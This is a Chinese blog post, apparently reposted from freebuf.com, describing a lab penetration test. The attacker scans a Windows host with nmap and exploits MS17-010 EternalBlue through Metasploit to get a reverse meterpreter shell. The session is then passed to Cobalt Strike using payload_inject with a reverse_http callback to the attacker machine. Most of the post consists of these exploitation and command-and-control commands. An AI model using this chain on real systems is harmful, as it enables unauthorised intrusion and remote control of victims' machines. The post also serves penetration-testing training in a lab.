MSF和CobaltStrike联动 – 作者:lyjsyqw

0x00写在前面

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!

因学未深,技未精,故水平有限,还请各位大佬勿喷!

0x00环境介绍

攻击机:192.168.60.129 (kali)

受害机:192.168.60.131

网关:192.168.60.2

工具:nmap、metaspolit、cobaltstrike

0x01攻击准备

首先部署受害主机调制网卡可以互相通信。图片[1]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

接下来部署web应用服务,搞的看起来像是真实的应用服务器一样哈图片[2]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

0x02前攻击阶段

通过使用nmap信息收集发现开放端口445、3389及操作系统版本信息。

nmap -A 192.168.60.131   图片[3]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

通过信息收集发现系统开放445端口,使用工具检测是否存在ms17_010漏洞,发现存在。图片[4]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

接近着神器1 Metaspolit上场

首先打开msf,进行漏洞利用

1.搜索利用漏洞模块

search ms17_010     图片[5]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

2.漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129

获得session

进入meterpreter会话。图片[6]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

接近着神器2Cobaltstrike上场

如果觉得功能太少,也可以和Cobaltstrike联动

启动Cobaltstrike 图片[7]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

现在获得是一个MSF的meterpreter类型的session,且session id为1

在Cobaltstrike新建一个监听,配置如下: 图片[8]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

在MSF中设置如下

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1

图片[9]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

exploit

图片[10]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

这样就可以看到在Cobaltstrike中获取到了了MSF弹回的Meterpreter会话。

图片[11]-MSF和CobaltStrike联动 – 作者:lyjsyqw-安全小百科

最后可以使用Cobaltstrike中集成的渗透模块进行进一步的测试。

注:只有Meterpreter类型的session才能派生给Cobaltstrike。

0x03总结思考

在测试过程中详细的信息收集意味着不同的渗透测试路线,也只有信息的关联使用和复用才能更加有效的放大渗透成果。

加油,我一直在路上ing……

来源:freebuf.com 2020-09-23 11:30:04 by: lyjsyqw

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论